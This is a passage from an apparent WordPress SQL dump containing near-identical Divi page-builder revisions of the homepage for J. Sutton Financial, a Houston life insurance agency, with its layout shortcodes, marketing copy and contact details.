custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:37:47','2023-04-02 19:37:47','',138,'http://cmdev-site1.com/?p=638',0,'revision','',0),(639,1,'2023-04-02 19:38:01','2023-04-02 19:38:01','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_3,1_3,1_3\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_typing_effect _builder_version=\"4.20.2\" _module_preset=\"default\" before_typing_effect=\"Want to know how much you need?\" typing_effect=\"Let\'s find out!\" hover_enabled=\"0\" sticky_enabled=\"0\" header_level=\"h2\" header_text_align=\"center\"][/dsm_typing_effect][dsm_button button_one_text=\"Get a Quote today!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:38:01','2023-04-02 19:38:01','',138,'http://cmdev-site1.com/?p=639',0,'revision','',0),(640,1,'2023-04-02 19:40:09','2023-04-02 19:40:09','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_3,1_3,1_3\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_typing_effect _builder_version=\"4.20.2\" _module_preset=\"default\" before_typing_effect=\"Want to know how much you need?\" typing_effect=\"Let\'s find out!\" hover_enabled=\"0\" sticky_enabled=\"0\" header_level=\"h2\" header_text_align=\"center\" typing_backspeed=\"200ms\"][/dsm_typing_effect][dsm_button button_one_text=\"Get a Quote today!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:40:09','2023-04-02 